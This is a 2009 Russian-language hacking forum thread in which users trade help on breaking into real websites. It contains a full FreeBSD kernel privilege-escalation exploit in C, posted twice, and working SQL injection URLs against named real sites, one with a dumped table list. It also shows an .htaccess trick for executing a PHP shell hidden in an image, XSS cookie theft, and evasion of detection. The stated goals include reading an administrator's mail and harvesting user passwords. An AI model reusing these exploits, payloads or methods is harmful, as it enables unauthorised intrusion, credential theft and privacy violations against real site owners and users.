и если подумать, то выше описанные нерабочий XSS можно испольщовать к примеру с такой целью.
Получаем доступ к какомуто аккаунту, дописываем у него в настройках в полу аватары нажный нас код и далее этот акк сам того неведая будет работать на нас, выполняя действия записынные в скрипте после каждого обновления транички или переходе на другую. Тож неплохо :)
massovka
11.04.2009, 18:58
такой вопрос
Я компилируею сплоит коммандой
gcc sploitname.c –o sploitname только не в netcat а теленето у меня получится это сделать?
error: syntax error before '{' token
gcc sploitname.c -o sploitname.c
ПИшет вот такое
Читай исходник сплоита, наверное он из паблика и в коде есть ошибка.
shellz[21h]
11.04.2009, 19:03
это не зависит, через какой клиент ты подключен к серверу и пытаешся, чтото компилировать.
Ошибка в сплойте.
Pashkela
11.04.2009, 19:10
кури язык "с", сам не можешь - код сплойта в студию, или ты еще сначала предварительно постов 20 сделаешь, пока догадаешься выложить код?
massovka
11.04.2009, 19:20
кури язык "с", сам не можешь - код сплойта в студию, или ты еще сначала предварительно постов 20 сделаешь, пока догадаешься выложить код?
/*
* This is a quick and very dirty exploit for the FreeBSD protosw vulnerability
* defined here:
* http://security.freebsd.org/advisories/FreeBSD-SA-08:13.protosw.asc
*
* This will overwrite your credential structure in the kernel. This will
* affect more than just the exploit's process, which is why this doesn't
* spawn a shell. When the exploit has finished, your login shell should
* have euid=0.
*
* Enjoy, and happy holidays!
* - Don "north" Bailey (don.bailey@gmail.com) 12/25/2008
*/
#include <sys/mman.h>
#include <sys/time.h>
#include <sys/stat.h>
#include <sys/proc.h>
#include <sys/types.h>
#include <sys/param.h>
#include <sys/socket.h>
#include <netgraph/ng_socket.h>
#include <unistd.h>
#include <stdlib.h>
#include <stdio.h>
#include <errno.h>
#define PAGES 1
#define PATTERN1 0x8f8f8f8f
#define PATTERN2 0x6e6e6e6e
typedef unsigned long ulong;
typedef unsigned char uchar;
int
x(void)
{
struct proc * p = (struct proc * )PATTERN1;
uint * i;
while(1)
{
if(p->p_pid == PATTERN2)
{
i = (uint * )p->p_ucred;
*++i = 0;
break;
}
p = p->p_list.le_next;
}
return 1;
}
int
main(int argc, char * argv[])
{
ulong addr;
uchar * c;
uchar * d;
uint * i;
void * v;
int pid;
int s;
if(argc != 2)
{
fprintf(stderr, "usage: ./x <allproc>\n");
return 1;
}
addr = strtoul(argv[1], 0, 0);
v = mmap(
NULL,
(PAGES*PAGE_SIZE),
PROT_READ|PROT_WRITE|PROT_EXEC,
MAP_ANON|MAP_FIXED,
-1,
0);
if(v == MAP_FAILED)
{
perror("mmap");
return 0;
}
c = v;
d = (uchar * )x;
while(1)
{
*c = *d;
if(*d == 0xc3)
{
break;
}
d++;
c++;
}
*c++ = 0xc3;
c = v;
while(1)
{
if(*(long * )c == PATTERN1)
{
*(c + 0) = addr >> 0;
*(c + 1) = addr >> 8;
*(c + 2) = addr >> 16;
*(c + 3) = addr >> 24;
break;
}
c++;
}
pid = getpid();
while(1)
{
if(*(long * )c == PATTERN2)
{
*(c + 0) = pid >> 0;
*(c + 1) = pid >> 8;
*(c + 2) = pid >> 16;
*(c + 3) = pid >> 24;
break;
}
c++;
}
s = socket(PF_NETGRAPH, SOCK_DGRAM, NG_DATA);
if(s < 0)
{
perror("socket");
return 1;
}
shutdown(s, SHUT_RDWR);
return 0;
}
// milw0rm.com [2008-12-28]
а заключить в код - не судьба не как..?
/*
* This is a quick and very dirty exploit for the FreeBSD protosw vulnerability
* defined here:
* http://security.freebsd.org/advisories/FreeBSD-SA-08:13.protosw.asc
*
* This will overwrite your credential structure in the kernel. This will
* affect more than just the exploit's process, which is why this doesn't
* spawn a shell. When the exploit has finished, your login shell should
* have euid=0.
*
* Enjoy, and happy holidays!
* - Don "north" Bailey (don.bailey@gmail.com) 12/25/2008
*/
#include <sys/mman.h>
#include <sys/time.h>
#include <sys/stat.h>
#include <sys/proc.h>
#include <sys/types.h>
#include <sys/param.h>
#include <sys/socket.h>
#include <netgraph/ng_socket.h>
#include <unistd.h>
#include <stdlib.h>
#include <stdio.h>
#include <errno.h>
#define PAGES 1
#define PATTERN1 0x8f8f8f8f
#define PATTERN2 0x6e6e6e6e
typedef unsigned long ulong;
typedef unsigned char uchar;
int
x(void)
{
struct proc * p = (struct proc * )PATTERN1;
uint * i;
while(1)
{
if(p->p_pid == PATTERN2)
{
i = (uint * )p->p_ucred;
*++i = 0;
break;
}
p = p->p_list.le_next;
}
return 1;
}
int
main(int argc, char * argv[])
{
ulong addr;
uchar * c;
uchar * d;
uint * i;
void * v;
int pid;
int s;
if(argc != 2)
{
fprintf(stderr, "usage: ./x <allproc>\n");
return 1;
}
addr = strtoul(argv[1], 0, 0);
v = mmap(
NULL,
(PAGES*PAGE_SIZE),
PROT_READ|PROT_WRITE|PROT_EXEC,
MAP_ANON|MAP_FIXED,
-1,
0);
if(v == MAP_FAILED)
{
perror("mmap");
return 0;
}
c = v;
d = (uchar * )x;
while(1)
{
*c = *d;
if(*d == 0xc3)
{
break;
}
d++;
c++;
}
*c++ = 0xc3;
c = v;
while(1)
{
if(*(long * )c == PATTERN1)
{
*(c + 0) = addr >> 0;
*(c + 1) = addr >> 8;
*(c + 2) = addr >> 16;
*(c + 3) = addr >> 24;
break;
}
c++;
}
pid = getpid();
while(1)
{
if(*(long * )c == PATTERN2)
{
*(c + 0) = pid >> 0;
*(c + 1) = pid >> 8;
*(c + 2) = pid >> 16;
*(c + 3) = pid >> 24;
break;
}
c++;
}
s = socket(PF_NETGRAPH, SOCK_DGRAM, NG_DATA);
if(s < 0)
{
perror("socket");
return 1;
}
shutdown(s, SHUT_RDWR);
return 0;
}
// milw0rm.com [2008-12-28]
PS - так понимаеш!
Видемо нет......
Тоесть закрыть тегами PHP в квадратных скобках....
что бы людям было удобнее читать код...
massovka
11.04.2009, 21:36
а заключить в код - не судьба не как..?
не прокатывает
navigat0r
11.04.2009, 22:48
Вот это сойдёт как sql инекция?Если да, то что можно сделать?
Error text: sql: Can't execute SQL command [ SELECT DTitle, DShort, DId, CShort FROM pshop_Docs, pshop_DocsCategories WHERE DType=9 AND DShow=1 AND DRemoved=0 AND CId=9 ORDER BY DId DESC LIMIT -10,10 ] [ You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-10,10' at line 1 ] (SHtml, (eval 9), 76)
mailbrush
11.04.2009, 22:56
Ну да, если даные передаешь ТЫ!
DrAssault
11.04.2009, 22:59
Вот это сойдёт как sql инекция?Если да, то что можно сделать?
Error text: sql: Can't execute SQL command [ SELECT DTitle, DShort, DId, CShort FROM pshop_Docs, pshop_DocsCategories WHERE DType=9 AND DShow=1 AND DRemoved=0 AND CId=9 ORDER BY DId DESC LIMIT -10,10 ] [ You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-10,10' at line 1 ] (SHtml, (eval 9), 76)
да, хотя дай линк, точно сказать нельзя...
navigat0r
11.04.2009, 23:16
http://www.site.ru/events/?page=1
при подстановке "-" перед 1 выскакивает это сообщение
Попробуй вместо - ,поставить 9999 (разумеется вместо 1)
Дай линк.......
Если не хочеш светить всем, скинь каму нить в ПМ....
Вариантов много может быть..
navigat0r
11.04.2009, 23:58
http://www.mir-bankov.ru/events/?page=1
http://www.mir-bankov.ru/events/?page=1
Инъекция после лимита при наличии ордер бая невозможна
Но ты рано сдался и выложил ссылку =( Тут работают лучшие телепаты страны
laedafess
12.04.2009, 04:04
http://www.mir-bankov.ru/glossary/?letter=99%C7'+union+select+convert(concat_ws(0x3a ,user(),database(),version())+using+cp1251),2,3/*
Что делать если при SQL-inj (при ошибке похоже) идёт редерект на index.php ?
Iceangel_
12.04.2009, 08:16
2 Byrger
Если тока при ошибке, то недопускать ошибок =)
ордер баем по присутсвию редиректа вычисляешь кол-во полей, проверяешь, ставя union+select+кол-во полей--+ если редиректа нету, крутишь скулю дальше, ничего особенного ;)
DrAssault
12.04.2009, 10:13
2 Byrger
Если тока при ошибке, то недопускать ошибок =)
ордер баем по присутсвию редиректа вычисляешь кол-во полей, проверяешь, ставя union+select+кол-во полей--+ если редиректа нету, крутишь скулю дальше, ничего особенного ;)
Бывает, что редирект идет просто вне зависимости от правильности условия, в таком случае необходимо в настройках броузера убрать автомат перенаправления, могу привести пример...
А смотрите допустим я нашёл дырку
site.ru/news.php?id=1+union+select+1,2--
Теперь нам надо вывести мои 1,2
Но есть я делаю так
site.ru/news.php?id=1999+union+select+1,2--
или
site.ru/news.php?id=-1+union+select+1,2--
То идёт 404 :(
Как быть?
Это 100% редирект идёт так-как новость не найдена...а SQL-inj Есть
Теперь нам надо вывести смои 1,2
чиво???
чиво???
Чиво чиво
Ячейки 1 2 надо на экран вывести...
DrAssault
12.04.2009, 10:56
Byrger ну че ты мозг колупашь всем? Тебе дали ответ уже во 2-ом посту сверху...
Byrger ну че ты мозг колупашь всем? Тебе дали ответ уже во 2-ом посту сверху...
Дак идёт ридерект на 404 при нормальном запросе к бд! Вы читать то умеете?
Я изменяю id На несуществующий и возникает 404 а не в инъекции у меня ошибка!
laedafess
12.04.2009, 11:09
А ты уверен, что там 2 поля и именно такой комментарий работает?
Iceangel_
12.04.2009, 11:13
2 Byrger
может стоять защита, от скулей, попробуй поэксперементировать со словами в инъекции
2 Byrger
может стоять защита, от скулей, попробуй поэксперементировать со словами в инъекции
тоесть в место
site.ru/news.php?id=-1+union+select+1,2--
нуно
site.ru/news.php?id=-1+union+selecT+1,2--
site.ru/news.php?id=-1+union+seLecT+1,2--
ну и далее пока ошибка не изчезнит.... (хотя не факт что изчезнет :) )
А может работать как с блайндом?! =\
....
Либо попытаться передавать параметры постом...
DrAssault
12.04.2009, 11:23
Пля ну не телепаты мы, дай работающий параметр, там посмотим...
А может работать как с блайндом?! =\
мну кажется,что может....... ИМХО
А ты уверен, что там 2 поля и именно такой комментарий работает?
site.ru/news.php?id=1+group+by+10-- 404
site.ru/news.php?id=1+group+by+5-- 404
site.ru/news.php?id=1+group+by+3-- 404
site.ru/news.php?id=1+group+by+2-- ok
site.ru/news.php?id=1+union+select+1,2-- ok
site.ru/news.php?id=-1+union+select+1,2-- 404
site.ru/news.php?id=1999+union+select+1,2-- 404
site.ru/news.php?id=1999+or+1=1+union+select+1,2-- ok
massovka
12.04.2009, 11:49
У меня такой вопрос а можно через phpMyAdmin залить шел с правими root! А то шел тоит токо читаю папки сайта! пробовал поднять права не получается. А нужно узнать пароли на мыло все юзеров
Iceangel_
12.04.2009, 11:49
2 Byrger
попробуй
site.ru/news.php?id=1+and+1=2+union+select+1,2--
2 Byrger
попробуй
site.ru/news.php?id=1+and+1=2+union+select+1,2--
ДЕРЖИ КУЧУ ++++
laedafess
12.04.2009, 11:54
У меня такой вопрос а можно через phpMyAdmin залить шел с правими root! А то шел тоит токо читаю папки сайта! пробовал поднять права не получается. А нужно узнать пароли на мыло все юзеров
root мускуля и root ОС - это не одно и тоже, так что нельзя. Бинди порт, ищи сплойт, рутай.
massovka
12.04.2009, 11:58
root мускуля и root ОС - это не одно и тоже, так что нельзя. Бинди порт, ищи сплойт, рутай.
сплоит юзал ничего не помогло там стоит FreeBSD 6.2-RELEASE
есть один сплоит http://milw0rm.com но не подходит! А очень нужно почту админа почитать
У меня нод32 всё время ругается на ИП
89.111.176.83 по порту 21
12.04.2009 12:31:52 Обнаружена атака Reverse TCP Desynchronization 89.111.176.83:21 192.168.0.100:4456 TCP
Подскажите что он пытается сделать на 21 порту
И что это за порт?
Причём локальные порты меняются...
4456
4795
1746
2282
Тип атаки 1 и тот-же
В чём уязвимость моей машины?
Pashkela
12.04.2009, 13:27
21 - FTP
Если залил шелл в картинке, то как им управлять?
Ну вроде как шелл загркузается аж нод заорал...
Но как его откруть для работы?
Pashkela
12.04.2009, 14:07
Куда залил, зачем залил, причем тут NOD32???
Шелл в картинке можно инклудить только если нашел LFI, просто так посмотреть картинку с шеллом в браузере ничего не даст
Iceangel_
12.04.2009, 14:10
2 Byrger
если ты залил просто шелл в картинке(расширение .jpg и подобные...)?
то для его работоспособности нужно, либо инклудить файл в другом скрипте, либо в папке с залитой картинкой создать файл .htaccess, со следующим содержанием:
<Files "имя_файла.jpg">
RemoveHandler .jpg
AddType application/x-httpd-php .jpg
</Files>
2 Byrger
если ты залил просто шелл в картинке(расширение .jpg и подобные...)?
то для его работоспособности нужно, либо инклудить файл в другом скрипте, либо в папке с залитой картинкой создать файл .htaccess, со следующим содержанием:
<Files "имя_файла.jpg">
RemoveHandler .jpg
AddType application/x-httpd-php .jpg
</Files>
Хмм... а как тогда можно реализовать такую фишку?
Шелл в картинке работает (что показывает НОД)
А если просто Php фаил залить то хтакцесс его блочит.
Как тут можно попробовать уязвимость найти?
Pashkela
12.04.2009, 14:19
2 Iceangel_:
если можешь менять или создавать .htaccess-ы, то зачем тогда вообще шелл?:))
Iceangel_
12.04.2009, 14:21
Шелл в картинке работает (что показывает НОД)
ндауж... =))))
выключи нод, и посмотри, будет ли "шелл" работать, раз строишь своё мнение и догадки на поведении своего антивируса... :D
з.ы. также посмотри содержание хтацесса, подумай...
2 Pashkela
Бывают ограничения, на заливаемое расширение, так назваемый "черный список"(запрет аплоада пхп файлов и т.п. )...
в таком случае, обычно посредством хтаццесса и обходится данное ограничение...
Pashkela
12.04.2009, 14:26
Это понятно:) А как получить доступ к самому .htaccess? Или как залить .htaccess? Тут у меня пробелы, просвяти плиз
.htaccess там не залить
так-как меняется имя файла...
вопрос : какобойти .htaccess в котором вписано allow from и тут айпи , если не совпадает пишет ошибку 403.
2: как залить шелл если можно грузить картинки , но при smile.php.gif пишет типо можно использовать только a-z а-я проверьте равельность файла.
3: есть ли тут инклуд? include_once('server_stats_generated.php');
$search = getSafeSearch($_GET['search']);
$script_name = "exchange.php";
$subpage = 'Exhange - Quotes';
Pashkela
12.04.2009, 14:35
Byrger и xMSAx:
http://forum.antichat.ru/thread12123.html
да, читал я это , но вот ответь есть или нету? на тех примерах я понл , а тут разобраться не могу.
Pashkela
12.04.2009, 14:47
$search = getSafeSearch($_GET['search'])
встроенной функции getSafeSearch в php нет, ты привел вызов функции, но не привел саму функцию, что ты хочешь тут услышать?
По кускам кода никогда нельзя сказать однозначно, поэтому и сливаюца сорцы и изучается ВЕСЬ код, а не только то место, что тебе понравилось
Jokester
12.04.2009, 14:48
Это понятно:) А как получить доступ к самому .htaccess? Или как залить .htaccess? Тут у меня пробелы, просвяти плиз
if(strpos($_FILES['file']['name'],'.php') or strpos($_FILES['file']['name'],'.phtml')) { die('error'); }
copy($_FILES['file']['tmp_name'], 'images/'.$_FILES['file']['name']);
А так более понятно?
При такой фильтрации лей .htaccess без проблем
PS
И вообще, тебе это ничего не напоминает? Ты это нигде раньше не видел? :D
Pashkela
12.04.2009, 14:50
jokester
:))) При такой фильтрации не нужен .htaccess, при такой фильтрации бери да лей шелл сразу, например kartinko.PHP
<?php
$a = 'лалала123.PHP';
if(strpos($a,'.php') or strpos($a,'.phtml')) die('error');
else echo 'УРА!!!' ;
?>
ой извени ( я не панимаю , ну вот если сможешь посотри..
<?php
include_once('nikashop/config.php');
include_once('nikashop/class_usershop.php');
include_once('nikashop/class_users.php');
include_once('nikashop/functions_usershop.php');
$obUsershop = new userShop;
$obUser = new storeUsers;
$userID = $vbulletin->userinfo['userid'];
$search = $vbulletin->db->escape_string($_GET['search']);
$gotShop = $obUsershop->gotShop($userID);
$arr = $obUsershop->getCheapest($search);
foreach ($arr as $key => $arr) {
$user_arr = $obUser->getUser($arr['username']);
$img = $arr['itemimage'];
if(empty($img)) {
$img = "Placeholder.gif";
}
$price = number_format($arr['price']);
eval('$usershop_cheapList .= "'. fetch_template('usershop_cheapList') .'";');
}
/* eval templates */
eval('$navbar = "'. fetch_template('navbar') .'";');
eval('$content = "'. fetch_template('usershop_sort') .'";');
eval('print_output("' . fetch_template('usershop_shell') . '");');
?>
а как я залью .htaccess ? никак..
и вы не знаете ответа на вопрос 2?
Jokester
12.04.2009, 14:55
Pashkela
ЭТО ПРИМЕР он не мой, и он для того , что-бы был понятен принцип, тебе нужно показать фильтрацию в которой регистр будет учитываться и в список будет добавлено побольше расширений ?
Речь о том, что существуют моменты при которых возможно залить .htaccess
Pashkela
12.04.2009, 15:00
и вы не знаете ответа на вопрос 2?
А ты сам понимаешь, что за код ты выложил? Ты там реально увидел код загрузки картинок что ли? Или вообще код загрузки чего-либо?
jokester:
ок, ок, в принципе понял
не, это просто код страницы nika.php на сервере
p.s. ну да я новичок. но зачем минусы ставить? от этого что измениться? может лучшепомочь? или сдесь такого способа нету?
DrAssault
12.04.2009, 19:27
не, это просто код страницы nika.php на сервере
p.s. ну да я новичок. но зачем минусы ставить? от этого что измениться? может лучшепомочь? или сдесь такого способа нету?
Лучше иди ка литиратуру почитай соответствующую, а потом придешь вопросы задавать, свои знания никто тебе в голову не запихает, одним словом заполняй вакум... RTFM...
massovka
12.04.2009, 20:04
Ребята такой вопрос просмотрел вес сервак нужно найти куда сохраняют контакты люди свои! просмотрел все базу ничего не нашел! Вод код кнопки когда заполняешь анкету и нажимаешь соханить. Может подскажите куда идет запись данных? спасибо
input type="submit" name="save" value=" СОХРАНИТЬ "
style="FONT-SIZE:18; font-weight:bold; Background-color:#ff6600; Color:#FFFFFF; HEIGHT:36;">
</td>
</tr>
</table>
</form>
<script type="text/javascript">
function set_model(t)
{
if(navigator.appName.indexOf("Microsoft") > -1){
var canSee = 'block'
} else {
var canSee = 'table-row';
}
$('table_params').style.display = canSee;
$('tr1').style.display = canSee;
$('tr2').style.display = canSee;
$('tr3').style.display = canSee;
$('tr4').style.display = canSee;
$('tr5').style.display = canSee;
$('tr6').style.display = canSee;
if (1 == t || 2 == t)
{
$('table_params').style.display = 'none';
}
else if (4 == t || 5 == t || 9 == t)
{
$('tr2').style.display = 'none';
}
else if(6 == t || 8 == t)
{
$('tr1').style.display = 'none';
$('tr2').style.display = 'none';
$('tr3').style.display = 'none';
$('tr4').style.display = 'none';
}
}
function formCallback(result, form) {
window.status = "valiation callback for form '" + form.id + "': result = " + result;
}
var valid = new Validation('fm', {immediate : true, onFormValidate : formCallback});
Validation.addAllThese([
['validate-password', 'Your password must be more than 6 characters and not be \'password\' or the same as your name', {
minLength : 7,
notOneOf : ['password','PASSWORD','1234567','0123456'],
notEqualToField : 'fm_login'
}],
['validate-password-confirm', 'Your confirmation password does not match your first password, please try again.', {
equalToField : 'fm_password'
}],
['validate-unique-login', 'Такой логин уже существует', function(v) {
var params = 'l='+v+'&id='+$F('id');
var laRequete = new Ajax.Request(
'check_login.php', { method: 'post', asynchronous: false, parameters: params});
return laRequete.transport.responseText;
}],
['validate-kcaptcha', 'Не правельно', function(v) {
var laRequete = new Ajax.Request(
'check_kcaptcha.php', { method: 'post', asynchronous: false, parameters: 'keystring='+v });
return laRequete.transport.responseText;
}]
]);
Pashkela
12.04.2009, 20:15
ни javascript, ни html сохранять что-либо в файлы не могут. Делай выводы - тут явно не весь код, а только то, что ты увидел в исходнике страницы.
PHP-код в исходнике ты не увидишь, и не надейся
ЗЫЖ И эти люди льют шеллы
massovka
12.04.2009, 20:21
ни javascript, ни html сохранять что-либо в файлы не могут. Делай выводы - тут явно не весь код, а только то, что ты увидел в исходнике страницы.
PHP-код в исходнике ты не увидишь, и не надейся
ЗЫЖ И эти люди льют шеллы
Учусь по немножку вот и спрашиваю! Кстати я могу читать php на серваке
DeepBlue7
12.04.2009, 20:51
Вообщем дело такое... есть 100% MSSQL injection, но невозможно вывести на экран результаты запроса. Как это можно сделать ?
DrAssault
12.04.2009, 21:00
Вообщем дело такое... есть 100% MSSQL injection, но невозможно вывести на экран результаты запроса. Как это можно сделать ?
Ты сам себе противоречишь: "невозможно вывести на экран результаты запроса" и "Как это можно сделать ?" ппц так может ты не можешь получить вывод? Линк в студию...
DeepBlue7
12.04.2009, 21:08
Ну всмысле допустим делаю запрос
Select id,pw from admin--
Он не выводит ответ.
Но Sql inj 100% есть...
Мда, и на основе чего ты решил что там 100% иньект?
DeepBlue7
12.04.2009, 21:18
Базу сносил )
Если уже пошло про инект то наверно union select, при этом придется угадывать тип выбираемых колонок и их кол-во, но мне кажеться что ты просто наркоманф, откуда ты знаешь что там есть id,pw и табличка admin? Наверно наверно стоит сначала почитать маны, то что ты написал - Select id,pw from admin-- полный бред, там же идет основной запрос и ты хочешь сразу без каких нибудь разделений запросов сделать второй(без union и подзапросов и etc)?Для начала подставь элементарную кавычку или какое нибудь логическое выражения если нет вывода, что бы судить о наличии sql injection а не тупа вводи sql запрос как тебе захочиться.
DeepBlue7
12.04.2009, 21:44
Хех... там сервер Mu Online. А я с серверами MU 2 года работал )
Ну не знаю как Mu Online но MSSQL есть MSSQL и наверно стоит почитать доки по синтаксису, короче невижу смысла тут распинаться и расжевывать, сейчас придет joker и справедливо наставит минусов за офф, либо вылаживай линк либо иди читай маны по SQL injection и синтаксис MSSQL.
DeepBlue7
12.04.2009, 21:59
Лови. http://max.luxteam.lv/dc.php
Ну попробуй нипример
Select Name,Resets from Character--
DrAssault
12.04.2009, 23:16
Чё это за чушь?
DeepBlue7
12.04.2009, 23:28
Люди, либо я туплю, либо вы....
Есть страница с SQL inj
НО MSSQL не хочет выводить результаты query... что делать ? епт )
НО MSSQL не хочет выводить результаты query... )
А что должно выводится ? Мы вводим логин и пароль, они подставляются в запрос, который проверяет наличие этого юзера (логина) в базе и правильность пароля. Если все ок - выполняется определенное действие (сори, не силен в латышском), если нет - то не выполняется. О каком выводе идет речь ?
Кстате, там имеется ограничение на количество вводимых символов для логина и пароля
<INPUT maxLength=10 name=acc value="login">
Возможно это можно обойти, если отправлять пакет непосредственно... у меня сейчас нет возможности проверить
DeepBlue7
13.04.2009, 00:31
ElteRUS, понятно. А maxlength это не проблема. Opera рулит )
Судя по всему данные вставляються в запрос в ковычках, а ковычки соответсвенно слешируються и поэтому не получиться ТАМ завершить логику запроса.
http://max.luxteam.lv/dc.php?acc=login&pw='+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATIO N_SCHEMA.TABLES)--&dc_start=1&Submit=Disconnectet
постом
massovka
13.04.2009, 00:47
ПРивет всем! Ребята такая история! Получил доступ к одному серваку имею доступ
к IP.Board имею доступ к phpMyAdmin есть шел на чтение в папке www
но нужно получить доступ к почтовому серверу и к админке сайта
те пароли которые подходят к IP.Board. не подходят ни к админке сайте ни на почтовику! Вчера пробовал запустить сплоит( на поднятие прав) не получилось (версия FreeBSD 6.2)
Подскажите что делать?
если есть шелл, то какие проблемы насчет доступа к админке ?
massovka
13.04.2009, 01:34
если есть шелл, то какие проблемы насчет доступа к админке ?
права у меня uid=1004(apache) gid=1003(apache) groups=1003(apache)
читаю только папку public_html
те пароли что нарыл в phpMyAdmin не подходят к админке
massovka
хмм прочитай файл авторизации к админке.. потом в базе найди нужные поля
кто-нибудь выложите ссылки на темы в этом форуме относительно того
как не палить баг в get-параметрах . слыхал что страницу сохраняют, потом get меняют на post . а как точно ?
надоело, засекают сразу
FarIZ, Вот тут если у вас Firefox (https://forum.antichat.ru/thread56473.html)
Перед использованием проверьте что уязвимость доступна через POST, не всегда это бывает...
есть сайт
http://www.juntadeandalucia.es
я росканил хспайдером мне дало интиресну весч
Данная версия вебсервера Apache содержит chunked encoding уязвимость, что, помимо выведения сервера из строя, позволяет атакующему выполнить произвольный код, если сервер работает под управлением ОС FreeBSD, OpenBSD или NetBSD.
и
2 Возможно выполнение атаки межсайтовый скриптинг. Межсайтовый скриптинг (Cross site scripting или XSS) это возможность вставки HTML кода в уязвимую страницу. Инъекция кода осуществляется через все доступные способы ввода информации. Успешное завершение атаки может привести к использованию значений различных переменных, доступных в контексте сайта, записи информации, перехвату пользовательских сессий и т.д.
http://222.zone-217.12.16.juntadeandalucia.es:8081/webct/ticket/ticketLogin?action=print_login&request_uri=%22%3E%3Cscript%3Ealert%28%27PTsecurit y+Scanner+Test%27%29%3C%2Fscript%3E%3C%22
как можна использовать ету уязвимость еть у кого ссылки на ету инфу буду благодарен ...
я пытался вдудлить туда XSS но ничего не дало
желательно примеры ли ресурсы такие по теме а не посылать в гугл я там был и там нех нету ...
хацкеры жду помощи )
теща
sql иньеция
http://www.juntadeandalucia.es/servicioandaluzdesalud/hpm/neumologia/noticias.php?id=-2295+or+1=1--
http://www.juntadeandalucia.es/averroes/~cepja4/html/menu.3.php?codigo=092321GT54'
а так же раскрытие путей
/mnt/centr2/41/41000612/includes/database.php
нащет хсс.. подкидывай сыслку админку и его куки летят тебе на снифер
massovka
13.04.2009, 18:46
Ребята такой вопрос! Где могут сохранятся пароли от админки cayt/admin ! В phpadmin ничего не нашел доступ из шел только в папки сайта! Где они могу прятятся пароли?
Shaitan-Devil
13.04.2009, 20:03
Ребята такой вопрос! Где могут сохранятся пароли от админки cayt/admin ! В phpadmin ничего не нашел доступ из шел только в папки сайта! Где они могу прятятся пароли?
Шелл есть? Есть доступ к скриптам? Посмотри, в одном из них могут храниться данные для доступа к БД. например cayt/admin/index.php
massovka
13.04.2009, 20:13
Шелл есть? Есть доступ к скриптам? Посмотри, в одном из них могут храниться данные для доступа к БД. например cayt/admin/index.php
да есть! Я вотчитал его не не могу разобратся! просто я начинающий может дам посмотришь его?
есть login.php и index.php
+++AndreyDevil+++
13.04.2009, 20:28
http://www.openworld.gov/news/gallery.php?id=-1'+union+select+version()/*
17 alumni
18 alumni_backup
19 alumni_link
20 alumni_old
21 archive
22 archive_file
23 archive_language
24 article
25 article_file
26 article_language
27 calendar
28 calendar_file
29 calendar_language
30 category
31 category_language
32 change_log
33 change_page
34 city
35 city_file
36 city_language
37 comment
38 comment_file
39 comment_language
40 contact
41 contact_access
42 contact_contactgroup
43 contact_language
44 contactgroup
45 contactgroup_language
46 country
47 country_language
48 delegation_file
49 enter_ip
50 faq
51 faq_file
52 faq_language
53 file
54 file_language
55 grantee
56 grantee_city
57 grantee_language
58 group
59 group_file
60 language
61 news
62 news_file
63 news_language
64 organization
65 organization_language
66 ow_theme
67 ow_theme_name
68 partnerbanner
69 phpbb_attach_quota
70 phpbb_attachments
71 phpbb_attachments_config
72 phpbb_attachments_desc
73 phpbb_auth_access
74 phpbb_banlist
75 phpbb_categories
76 phpbb_config
77 phpbb_confirm
78 phpbb_disallow
79 phpbb_extension_groups
80 phpbb_extensions
81 phpbb_forbidden_extensions
82 phpbb_forum_prune
83 phpbb_forums
84 phpbb_groups
85 phpbb_posts
86 phpbb_posts_deleted
87 phpbb_posts_text
88 phpbb_posts_text_deleted
89 phpbb_privmsgs
90 phpbb_privmsgs_text
91 phpbb_quota_limits
92 phpbb_ranks
93 phpbb_search_results
94 phpbb_search_wordlist
95 phpbb_search_wordmatch
96 phpbb_sessions
97 phpbb_sessions_keys
98 phpbb_smilies
99 phpbb_themes
100 phpbb_themes_name
101 phpbb_topics
102 phpbb_topics_watch
103 phpbb_user_group
104 phpbb_users
105 phpbb_users_deleted
106 phpbb_vote_desc
107 phpbb_vote_results
108 phpbb_vote_voters
109 phpbb_words
110 position_code
111 position_code_language
112 position_group
113 position_group_language
114 press
115 press_file
116 press_language
117 pub_gallery
118 pub_gallery_delegation
119 pub_gallery_file
120 pub_language
121 publisher
122 publisher_logo
123 publisher_name
124 section
125 section_backup
126 section_file
127 section_language
128 state
129 state_language
130 subscribers
131 supporter
132 supporter_language
133 sys_group
134 sys_language
135 sys_user
136 sys_user_group
137 snauthys_user_name
138 sys_user_u
139 translation
http://www.openworld.gov/phpMyAdmin/
phpMyAdmin есть но нет таблицы с юзерами.......как я понял я нервно курю в сторонке, т.к мне прав не хватает прочитать таблицы phpMyAdmin'а?
DrAssault
13.04.2009, 20:39
104 phpbb_users - таблица с юзверями...
Андрей будь внимательней...
+++AndreyDevil+++
13.04.2009, 20:44
Может я слепой, но почему то форума там не наблюдаю (!)...
DrAssault
13.04.2009, 21:00
Может я слепой, но почему то форума там не наблюдаю (!)...
В таком случае встречный вопрос, таблицу с юзерами от чего ты ищешь, реги так сказать я там тоже не наблюдаю... хотя если только на поддомене: dd.openworld.gov жаль акка нет, регаться влом... насчет форума точно сказать не могу... скорее всего был когда то а таблицы не снесли...
+++AndreyDevil+++
13.04.2009, 21:09
В таком случае встречный вопрос, таблицу с юзерами от чего ты ищешь, реги так сказать я там тоже не наблюдаю... хотя если только на поддомене: dd.openworld.gov жаль акка нет, регаться влом... насчет форума точно сказать не могу...
Я уже задал вопрос!
+++AndreyDevil+++, ОМГ =) а ничего что форум может быть вовсе не здесь, а на соседнем сайте? reverse-ip вам в руки =) а так еще проще concat_ws(0x3a,TABLE_SCHEMA,TABLE_NAME) тогда будете еще знать в какой БД данная таблица, может дать наводку где это искать...
geezer.code
13.04.2009, 21:19
+++AndreyDevil+++
phpbb - скелет в шкафу он там когдато был(проверь по гуглу ), форум снесли , а таблицы забыли.
laedafess
13.04.2009, 21:23
http://web.archive.org/web/20031121221659/http://www.openworld.gov/
был, теперь нету.. ищи то, куда можно подставить данные из sys_user
Здравствуйте
Вопрос
на сайте www.sait.ru/new's.html
Пишет: You have an error in your SQL syntax... и.т.д
можно ли делать запрос, и kak вообще это должно выглядит.
пробовал так: www.sait.ru/news+group+by+1+.html
Неправильно )))
Shaitan-Devil
14.04.2009, 02:49
А если так?
http://www.sait.ru/news+group+by+1/*.html
http://www.sait.ru/news/**/group/**/by/**/1.html
Вообще там mod_rewrite. ВОзможно скуль с посимвольным......
www.zemskov.ru
таких вообще много где в конце .html
но толком не знаю kak делать запрос.
кто нибудь может показать на примере или мост есть статья .
Забавная инъекция
http://www.zemskov.ru/e_mail' and 1=2 union select 1,0x706870696e666f28293b,3,4,5,6,7,8,9,10,11,12,13 ,14,15+--+.html
откудого ты подобрал эти символы ??
%20 это видимо пробле. а остальное ?
спасибо )
0x706870696e666f28293b=phpinfo();
